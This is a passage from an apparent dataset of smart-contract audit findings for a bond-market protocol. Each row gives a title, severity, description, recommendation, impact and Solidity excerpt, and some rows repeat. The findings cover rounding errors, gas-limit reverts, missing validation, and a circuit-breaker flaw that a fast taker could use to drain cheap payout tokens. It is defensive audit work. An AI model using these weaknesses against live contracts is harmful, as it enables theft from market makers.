minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. 
Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will not be possible to create a new market.\\nOr you can provide `minDebtBuffer` to be 100% or 0% that will break logic of market closing.",Add input validation.,Can't create a new market, or market logic will not work as designed.,```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n +BondAggregator.liveMarketsBy eventually will revert because of block gas limit,medium,"BondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and the owner matches). This all consumes a lot of gas, even though it is called from a view function.
And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.",Remove not active markets or some start and end indices to functions.,Functions will always revert and whoever depends on it will not be able to get information.,```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n +meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is called,medium,"When BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert 
Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. 
max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? 
market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.",Update meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.,Tuning logic will not be completed when needed.,"```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n" +Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From 
Market,medium,"The current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. 
However, he could still purchase the 50 bond tokens in the current transaction.","Considering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.","In the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.","```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. 
If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n" +Market Price Lower Than Expected,medium,"The market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? 
price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\n","Ensure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\n","Loss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.","```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? 
price : markets[id_].minPrice;\\n }\\n```\\n" +Teller Cannot Be Removed From Callback Contract,medium,"If a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.","In the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the 
issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.","```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n" +Create Fee Discount Feature Is Broken,medium,"The create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. 
As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\n",Implement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\n,"The create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. 
As such, the users will not obtain any discount from the protocol when using the create function.","```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n" +`BondAggregator.findMarketFor` Function Will Break In Certain Conditions,medium,"`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. 
This will cause the entire for-loop to ""break"" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\n",Consider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.,"The find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. 
The market makers affected by this issue will lose the opportunity to sell their bond tokens.","```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n" +Auctioneer Cannot Be Removed From The Protocol,medium,"If a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\n","In the event that a whitelisted Auctioneer is found to be vulnerable and has been actively 
exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.",```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n +Debt Decay Faster Than Expected,medium,"The debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. 
At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n","When computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\n","When the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\n","```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n" +BondBaseSDA.setDefaults doesn't validate inputs,medium,"BondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n 
}\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will be not possible to create new market.\\nOr you can provide `minDebtBuffer` to be 100% ot 0% that will break logic of market closing.",Add input validation.,Can't create new market or market logic will be not working as designed.,```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n +BondAggregator.liveMarketsBy eventually will revert because of block gas limit,medium,"BondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and owner matches. This all consumes a lot of gas, even that is called from view function. 
And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.",Remove not active markets or some start and end indices to functions.,Functions will always revert and whoever depends on it will not be able to get information.,```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n +meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is called,medium,"When BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert 
